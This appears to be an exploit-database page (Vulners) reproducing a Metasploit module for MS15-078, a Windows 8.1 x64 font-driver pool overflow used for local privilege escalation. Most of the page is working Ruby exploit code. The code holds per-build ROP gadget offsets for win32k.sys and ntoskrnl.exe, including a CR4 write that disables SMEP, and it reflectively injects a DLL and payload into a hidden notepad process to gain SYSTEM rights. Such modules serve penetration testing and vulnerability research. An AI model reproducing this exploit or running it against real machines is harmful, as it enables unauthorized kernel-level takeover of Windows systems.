Vulners
Lucene search
MS15-078 Microsoft Windows Font Driver Buffer Overflow Exploit
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | Exploit for Buffer Underflow in Microsoft | 7 Sep 201710:05 | – | gitee |
| Exploit for Buffer Underflow in Microsoft | 13 Oct 202016:31 | – | gitee |
 | CVE-2015-2426 | 20 Jul 201500:00 | – | attackerkb |
 | Vulnerability of the Windows operating system, allowing a perpetrator to execute arbitrary code | 25 Jan 201600:00 | – | bdu_fstec |
 | CVE-2015-2426 | 17 Sep 201500:00 | – | circl |
| CVE-2015-2433 | 17 Sep 201500:00 | – | circl |
 | Microsoft Windows Adobe Type Manager Library Remote Code Execution Vulnerability | 28 Mar 202200:00 | – | cisa_kev |
 | Microsoft Windows OpenType Font Driver Remote Code Execution Vulnerability | 21 Jul 201500:00 | – | cnvd |
| Microsoft Windows Kernel 'Win32k.sys' Information Disclosure Vulnerability | 12 Aug 201500:00 | – | cnvd |
 | Microsoft Windows ATMFD Font Driver Kernel Pool Overflow (MS15-078: CVE-2015-2426) | 20 Jul 201500:00 | – | checkpoint_advisories |
10
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ManualRanking
WIN32K_VERSIONS = [
'6.3.9600.17393',
'6.3.9600.17630',
'6.3.9600.17694',
'6.3.9600.17796',
'6.3.9600.17837',
'6.3.9600.17915'
]
NT_VERSIONS = [
'6.3.9600.17415',
'6.3.9600.17630',
'6.3.9600.17668',
'6.3.9600.17936'
]
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
'Description' => %q{
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
a malformed font. The vulnerability was exploited by the hacking team and disclosed on
the july data leak. This module has been tested successfully on vulnerable builds of
Windows 8.1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Eugene Ching', # vulnerability discovery and exploit
'Mateusz Jurczyk', # vulnerability discovery
'Cedric Halbronn', # vulnerability and exploit analysis
'juan vazquez' # msf module
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
},
'Targets' => [
[ 'Windows 8.1 x64', { } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['CVE', '2015-2426'],
['CVE', '2015-2433'],
['MSB', 'MS15-078'],
['MSB', 'MS15-080'],
['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
],
'DisclosureDate' => 'Jul 11 2015',
'DefaultTarget' => 0
}))
end
def patch_win32k_offsets(dll)
@win32k_offsets.each do |k, v|
case k
when 'info_leak'
dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
when 'pop_rax_ret'
dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
when 'xchg_rax_rsp'
dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
when 'allocate_pool'
dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
when 'pop_rcx_ret'
dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
when 'deref_rax_into_rcx'
dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
when 'mov_rax_into_rcx'
dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
when 'pop_rbx_ret'
dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
when 'ret'
dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
when 'mov_rax_r11_ret'
dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
when 'add_rax_rcx_ret'
dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
when 'pop_rsp_ret'
dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
when 'xchg_rax_rsp_adjust'
dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
when 'chwnd_delete'
dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
end
end
end
def set_win32k_offsets
@win32k_offsets ||= Proc.new do |version|
case version
when '6.3.9600.17393'
{
'info_leak' => 0x3cf00,
'pop_rax_ret' => 0x19fab, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x6121, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x98156, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc432f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc4332, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
'ret' => 0x6e314, # ret C3
'mov_rax_r11_ret' => 0x7018e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xee38f, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0xbc8f, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
'chwnd_delete' => 0x165010 # CHwndTargetProp::Delete
}
when '6.3.9600.17630'
{
'info_leak' => 0x3d200,
'pop_rax_ret' => 0x19e9b, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x6024, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x84f4f, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3f7f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc3f82, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
'ret' => 0x14dc, # ret C3
'mov_rax_r11_ret' => 0x7034e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xed33b, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0xbb93, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x146EE0 # CHwndTargetProp::Delete
}
when '6.3.9600.17694'
{
'info_leak' => 0x3d300,
'pop_rax_ret' => 0x151f4, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x600c, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x2cf10, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3757, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc375a, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x6682, # pop rbx # ret # 5B C3
'ret' => 0x6683, # ret C3
'mov_rax_r11_ret' => 0x7010e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xecd7b, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0x71380, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x1513D8 # CHwndTargetProp::Delete
}
when '6.3.9600.17796'
{
'info_leak' => 0x3d000,
'pop_rax_ret' => 0x19e4f, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x5f64, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x97a5e, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3aa7, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc3aaa, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x1B20, # pop rbx # ret # 5B C3
'ret' => 0x1B21, # ret C3
'mov_rax_r11_ret' => 0x7010e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xecf8b, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0x29fd3, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x150F58 # CHwndTargetProp::Delete
}
when '6.3.9600.17837'
{
'info_leak' => 0x3d800,
'pop_rax_ret' => 0x1a51f, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x62b4, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x97a4a, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3687, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc368a, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
'ret' => 0x14dc, # ret C3
'mov_rax_r11_ret' => 0x94871, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xecbdb, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0xbd2c, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x15A470 # CHwndTargetProp::Delete
}
when '6.3.9600.17915'
{
'info_leak' => 0x3d800,
'pop_rax_ret' => 0x1A4EF, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x62CC, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x9765A, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xC364F, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xC3652, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14DB, # pop rbx # ret # 5B C3
'ret' => 0x14DC, # ret # C3
'mov_rax_r11_ret' => 0x7060e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xECDCB, # add rax, rcx # 48 03 C1 C3
'pop_rsp_ret' => 0xbe33, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
'chwnd_delete' => 0x15A220 # CHwndTargetProp::Delete
}
else
nil
end
end.call(@win32k)
end
def patch_nt_offsets(dll)
@nt_offsets.each do |k, v|
case k
when 'set_cr4'
dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
when 'allocate_pool_with_tag'
dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
end
end
end
def set_nt_offsets
@nt_offsets ||= Proc.new do |version|
case version
when '6.3.9600.17415'
{
'set_cr4' => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x2a3a50 # ExAllocatePoolWithTag
}
when '6.3.9600.17630'
{
'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag
}
when '6.3.9600.17668'
{
'set_cr4' => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x2A3A50 # ExAllocatePoolWithTag
}
when '6.3.9600.17936'
{
'set_cr4' => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
'allocate_pool_with_tag' => 0x29FA50 # ExAllocatePoolWithTag
}
else
nil
end
end.call(@ntoskrnl)
end
def atmfd_version
file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
ver
end
def win32k_version
file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
ver
end
def ntoskrnl_version
file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
ver
end
def check
# We have tested only windows 8.1
if sysinfo['OS'] !~ /Windows 8/i
return Exploit::CheckCode::Unknown
end
# We have tested only 64 bits
if sysinfo['Architecture'] !~ /(wow|x)64/i
return Exploit::CheckCode::Unknown
end
atmfd = atmfd_version
# atmfd 5.1.2.238 => Works
unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243')
return Exploit::CheckCode::Safe
end
# win32k.sys 6.3.9600.17393 => Works
@win32k = win32k_version
unless @win32k && WIN32K_VERSIONS.include?(@win32k)
return Exploit::CheckCode::Detected
end
# ntoskrnl.exe 6.3.9600.17415 => Works
@ntoskrnl = ntoskrnl_version
unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Appears
end
def exploit
print_status('Checking target...')
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
check_result = check
if check_result == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Target not vulnerable')
end
if check_result == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if check_result == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
end
unless get_target_arch == ARCH_X86_64
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
end
print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")
set_win32k_offsets
fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?
set_nt_offsets
fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?
begin
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Sandboxes could not allow to create a new process
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
library_path = ::File.expand_path(library_path)
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
dll = ''
::File.open(library_path, 'rb') { |f| dll = f.read }
patch_win32k_offsets(dll)
patch_nt_offsets(dll)
exploit_mem, offset = inject_dll_data_into_process(process, dll)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
# 0day.today [2018-02-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Sep 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.91754